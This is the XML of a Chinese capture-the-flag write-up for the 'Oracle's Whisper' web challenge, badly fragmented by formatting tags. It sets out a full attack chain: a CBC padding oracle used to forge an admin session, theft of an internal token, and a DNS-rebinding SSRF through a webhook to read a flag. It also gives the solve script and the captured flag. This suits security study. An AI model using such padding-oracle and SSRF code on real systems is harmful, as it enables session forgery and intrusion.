        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">:6000/cache/template?name=/flag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考虑到</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> DNS Rebinding </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">具有一定的概率性，并非每次都能一次性命中，因此自动化程序中通常会包含循环探测机制。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">在我的实弹演练过程中，前两轮请求均遭到了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rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">拒绝，直至第三轮才成功欺骗解析，得到了如下反馈：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"ISCC{PnHCWSSKcJBm5M6ssZXV}"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"/flag"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至此，我们成功截获了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ISCC{PnHCWSSKcJBm5M6ssZXV}</w:t>
      </w:r>
    </w:p>
    <w:bookmarkEnd w:id="18"/>
    <w:bookmarkStart w:id="20" w:name="header-n115"/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">七、完整利用脚本</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">一键通关代码的路径如下：</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1008"/>
        </w:numPr>
      </w:pPr>
      <w:hyperlink r:id="rId19">
        <w:r>
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t xml:space="preserve">solve</w:t>
        </w:r>
        <w:r>
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:i/>
            <w:iCs/>
          </w:rPr>
          <w:t xml:space="preserve">oracle</w:t>
        </w:r>
        <w:r>
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t xml:space="preserve">whisper.py</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">执行命令参考：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'C:\Users\ROG\.cache\codex-runtimes\codex-primary-runtime\dependencies\python\python.exe'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\WEB\oracle_whisper\solve_oracle_whisper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该工具将被设计为无人值守模式，依次执行下述操作：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触发</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> Padding Oracle </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">漏洞以推算加密中间态。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生成具有超级权限的虚假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/api/profile</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">端点以窃取</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">internal_token</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">数据。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持续不断地向</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">/api/webhook/test</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">发起请求进行盲打。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DNS </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">重新绑定生效的瞬间，抓取包含</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">ISCC{...}</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">格式的最终答案。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把获取到的答案妥善存入</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">artifacts/flag.txt</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">文件中。</w:t>
      </w:r>
    </w:p>
    <w:bookmarkEnd w:id="20"/>
    <w:bookmarkStart w:id="21" w:name="header-n136"/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">八、完整脚本正文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"""Oracle's Whisper solve script.</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="CommentTok"/>
        </w:rPr>
        <w:t xml:space="preserve">利用链：</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="CommentTok"/>
        </w:rPr>
        <w:t xml:space="preserve">1. /api/session/decrypt 存在 CBC Padding Oracle。</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="CommentTok"/>
        </w:rPr>
        <w:t xml:space="preserve">2. 通过倒推中间值伪造 admin session。</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="CommentTok"/>
        </w:rPr>
        <w:t xml:space="preserve">3. 使用 admin session 访问 /api/profile 获取 internal_token。</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="CommentTok"/>
        </w:rPr>
        <w:t xml:space="preserve">4. 借助 /api/webhook/test + DNS rebinding 访问内网 /flag。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DEFAULT_BASE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"http://39.105.213.28:12605"</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">DEFAULT_WEBHOOK_URL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"http://7f000001.01010101.rbndr.us:6000/cache/template?name=/flag"</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">FLAG_RE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</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="CharTok"/>
        </w:rPr>
        <w:t xml:space="preserve">\r\n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{1,256}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b64url_encode(data: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base64.urlsafe_b64encode(data).decode().rstrip(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xor_bytes(left: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right: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(left, right))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retry_sleep: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.retry_sleep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retry_sleep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 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resp.getcode(),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(resp.info().items()), resp.read()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urllib.error.HTTPError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exc.code,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(exc.headers.items()), exc.read()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extra_headers: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"oracle-whisper-solve/1.0"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extra_headers:</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">            headers.update(extra_headers)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path,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json.dumps(payload,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).encode(),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cookie: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"oracle-whisper-solve/1.0"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cookie:</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">            headers[</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="StringTok"/>
        </w:rPr>
        <w:t xml:space="preserve">"Cookie"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path,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oracle(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blob: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该接口的关键差异是：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400 -&gt; padding 错误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422/200/... -&gt; padding 正确，只是明文未必能被成功解码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b64url_encode(blob)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token}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.retries):</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">            code,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.post_json(</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="StringTok"/>
        </w:rPr>
        <w:t xml:space="preserve">"/api/session/decrypt"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">, payload)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.retry_sleep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"oracle hit rate limiting too many times"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recover_intermediate(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target_block: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(target_block)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block must be 16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dec[i] = D_k(target_block)[i]</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">        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(BLOCK)</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">        forged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(BLOCK)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BLOCK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guess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BLOCK):</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">                    forged[j]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dec[j]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pad</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">                forged[idx]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guess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(forged)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target_block):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dec[idx]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guess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recover byte at pad=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f"[oracle] recovered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pad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/16 bytes for current block"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(dec)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forge_session(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(plaintext)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"plaintext must be padded to a multiple of 16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[plaintext[i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(plaintext), BLOCK)]</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">        cipher_blocks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(blocks)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cipher_blocks[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os.urandom(BLOCK)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从最后一个密文块开始逆推：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如果知道 I_i = D_k(C_i)，则只需设置 C_{i-1} = I_i xor P_i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(blocks)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.recover_intermediate(cipher_blocks[idx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cipher_blocks[idx]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xor_bytes(dec, blocks[idx])</w:t>
      </w:r>
      <w:r>
        <w:br/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.join(cipher_blocks)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b64url_encode(token)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code, _,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</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="StringTok"/>
        </w:rPr>
        <w:t xml:space="preserve">"/api/profile"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">, cookie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f"session=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f"/api/profile returned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json.loads(raw.decode(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internal_token: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"X-Internal-Token"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">: internal_token},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.post_json(</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="StringTok"/>
        </w:rPr>
        <w:t xml:space="preserve">"/api/webhook/test"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">, payload, extra_headers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"Cookie"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f"session=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pkcs7_pad(data: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block_size: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block_size)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pad_len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([pad_len])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pad_len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parse_webhook_response(raw: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(body,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json.dumps(body,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(body,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json.loads(body)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(nested,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json.dumps(nested,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extract_flag(text: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FLAG_RE.search(text)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"Reproduce Oracle's Whisper with a CBC padding oracle"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DEFAULT_BASE,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"challenge base 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"--webhook-url"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DEFAULT_WEBHOOK_URL,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"internal webhook URL used for flag extraction"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"--timeout"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 timeout in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"--retries"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"oracle retry count on 429"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"--retry-sleep"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"sleep between oracle retries"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"--artifacts-dir"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 directory"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"--attempts"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 retries"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artifacts_dir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Path(args.artifacts_dir)</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">    artifacts_dir.mkdir(parents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Client(args.base,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args.timeout, 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args.retries, retry_sleep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args.retry_sleep)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题目实际接受的会话 JSON 为：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{"user":"oracle","role":"admin"}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pkcs7_pad(</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="StringTok"/>
        </w:rPr>
        <w:t xml:space="preserve">b'{"user":"oracle","role":"admin"}'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forging admin session"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client.forge_session(plaintext)</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">    (artifacts_dir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"admin_token.txt"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">).write_text(token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client.fetch_profile(token)</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">    (artifacts_dir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"profile.json"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">).write_text(json.dumps(profile,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internal_token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"internal_token"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internal_token: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"internal_token missing from /api/profile"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admin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internal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internal_token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args.attempts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code, _,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client.trigger_webhook(token, internal_token, args.webhook_url)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parse_webhook_response(raw)</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">        (artifacts_dir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f"webhook_attempt_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).write_text(text,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extract_flag(text)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flag:</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">            (artifacts_dir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"flag.txt"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">).write_text(flag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"[-] flag not found; try running again"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21"/>
    <w:bookmarkStart w:id="22" w:name="header-n138"/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">九、脚本输出文件</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">当上述程序执行完毕后，您可以在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rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">文件夹内找到以下产物：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admin_token.txt</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">：通过算法伪造出来的特权</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> session </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">字符串。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profile.json</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">：包含内网请求凭据（</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">internal_token</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">）的用户档案信息。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webhook_attempt_*.txt</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">：历次探测</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> webhook </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">接口时服务端响应的完整记录。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flag.txt</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">：我们所追求的最终目标答案。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E:/CTFstudy/&#36825;&#26159;ISCC&#21306;&#22495;&#36187;/WEB/oracle_whisper/solve_oracle_whisp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E:/CTFstudy/&#36825;&#26159;ISCC&#21306;&#22495;&#36187;/WEB/oracle_whisper/solve_oracle_whisp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2026-05-17T07:45:17Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2026-05-17T07:45:17Z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